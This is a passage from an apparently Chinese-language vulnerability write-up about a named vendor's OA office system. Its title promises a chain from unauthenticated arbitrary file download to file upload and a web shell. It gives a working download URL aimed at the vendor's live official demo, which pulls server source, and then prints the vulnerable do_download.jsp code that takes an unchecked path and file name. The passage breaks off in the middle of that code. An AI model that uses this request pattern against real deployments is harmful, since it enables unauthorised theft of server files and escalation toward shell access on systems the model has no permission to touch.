某OA系统无需登录，从任意文件下载，下载源码，到源码分析，到任意文件上传拿GetShell

官网：http://www.ttyoa.com/WebDst/index.htm?TopMenu=sy

北京点石通科技有限公司，点石通OA办公自动化系统

官方演示：http://www.ttyoa.com/Main3/sy.jsp

下面就拿官方demo进行测试。

0x001 第一处任意文件下载

无需登录，文件下载，文件下载链：

http://www.ttyoa.com/Common/Js/UploadEx/do_download.jsp?UpLoadPath=/Common/Js/UploadEx/&FileName=do_download.jsp
 

已经下载do_download.jsp文件，我们来看看源码：
 

<%@ page contentType="text/html; charset=gb2312" %>
<%@page import="com.jspsmart.upload.*"%>
<%
      String szUpLoadPath=request.getParameter("UpLoadPath");
      String szFileName=request.getParameter("FileName");
      String path=request.getRealPath(""); 

               //新建一个SmartUpload对象
      SmartUpload su = new SmartUpload();
               //初始化
      su.initialize(pageContext);
               //设定contentDisposition为null以禁止浏览器自动打开文件，
               //保证点击链接后是下载文件。若不设定，则下载的文件扩展名为
               //doc时，浏览器将自动用word打开它。扩展名为pdf时，
               //浏览器将用acrobat打开。
      su.setContentDisposition(null);
               //下载文件    
      //{{
      //如果不用如下的，则response.getWriter(),因为这个方法是和response.getOutputStream()相冲突
      //html这样的文档不能下载。
      out.clear();
      out = pageContext.pushBody();
      /